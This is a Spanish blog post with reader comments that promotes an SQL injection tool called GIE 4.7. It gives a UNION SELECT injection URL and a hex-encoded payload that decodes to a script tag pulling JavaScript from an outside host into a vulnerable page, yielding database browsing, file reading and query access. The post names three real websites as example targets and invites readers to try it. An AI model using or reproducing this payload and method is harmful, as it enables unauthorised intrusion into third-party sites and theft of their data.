Bueno... navegando por ahí me encuentro con una de las mejores herramientas de SQL Injection que me ha tocado probar...
Es sin duda una execelente herramienta que vale la pena tener siempre en cuenta, ya que su uso es extremadamente sencillo y no se requiere de ningún tipo de instalación.
Lo único que necesitas es una web vulnerable a SQLi con el formato:
http://www.webvulnerable.com/new.php?id=-1+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12--
[+] vuln in num/s: |2|3|
Entonces el código GIE 4.7 (General Injection Explorer 4.7) se pone en algún número visible:
http://www.webvulnerable.com/new.php?id=-1+union+select+0,1,(GIE),3,4,5,6,7,8,9,10,11,12--
Código GIE 4.7:
(0x3c736372697074207372633d22687474703a2f2f73696e64656c656e2e636c2f61646d696e2f75706c6f6164732f696d616765732f4769452e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e)
Entonces la URL final quedaría así:
http://www.webvulnerable.com/new.php?id=-1+union+select+0,1,(0x3c736372697074207372633d22687474703a2f2f73696e64656c656e2e636c2f61646d696e2f75706c6f6164732f696d616765732f4769452e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e),3,4,5,6,7,8,9,10,11,12--
Ahora pruebenlo ustedes y disfrútenlo...
[*] Screens:
explorador de bases de datos.
lector de archivos, con Bruteforce.
consola de peticiones, en la imagen un ejemplo
de una query que busca mails en la base de datos.
variables del servidor
Historial de Inyecciones, para el que quiera
saber un poco mas sobre el funcionamiento de la GIE
[*] Ejemplos:
SQLi GIE [adegasgalegas.es]
SQLi GIE [rubias19.com]
SQLi GIE [comic-ar.com]
Codigo de fuente de GIE 4.7
Fuente: http://ponymagic.diosdelared.com/
[+] Salu2
[+] ZioneR
:O EXCELENTEEEEE !!!!
ResponderEliminarAmigo excelente gracias
ResponderEliminarthis is amazing.. is there a way i can see that .js file? I'm extremely interested.
ResponderEliminarkeep up that good work :)
El host donde se encuentra el GIE se cayó...
ResponderEliminarAsí que no funciona :(
[+] Salu2